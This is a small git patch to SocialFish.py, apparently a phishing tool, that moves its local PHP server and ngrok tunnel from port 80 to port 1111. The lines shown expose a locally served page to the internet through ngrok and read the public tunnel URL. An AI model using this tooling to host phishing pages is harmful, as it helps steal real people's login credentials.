From 4db99a906e28bb0e4ba8259cf82a0b67d8467ecb Mon Sep 17 00:00:00 2001 From: An0nUD4Y Date: Wed, 25 Apr 2018 16:15:03 +0530 Subject: [PATCH] SocialFish Now reconfigured to use port:1111 It will help to remove conflicts like already in use. Now it can be used with many other tools at the same time. Without any port conflicts. --- SocialFish.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SocialFish.py b/SocialFish.py index e0aa971..22ddc9b 100644 --- a/SocialFish.py +++ b/SocialFish.py @@ -212,7 +212,7 @@ def runPEnv(): exit(0) def runNgrok(): - system('./Server/ngrok http 80 > /dev/null &') + system('./Server/ngrok http 1111 > /dev/null &') sleep(10) system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url') url = open('ngrok.url', 'r') @@ -220,7 +220,7 @@ def runNgrok(): url.close() def runServer(): - system("cd Server/www/ && sudo php -S 127.0.0.1:80") + system("cd Server/www/ && sudo php -S 127.0.0.1:1111") if __name__ == "__main__": try: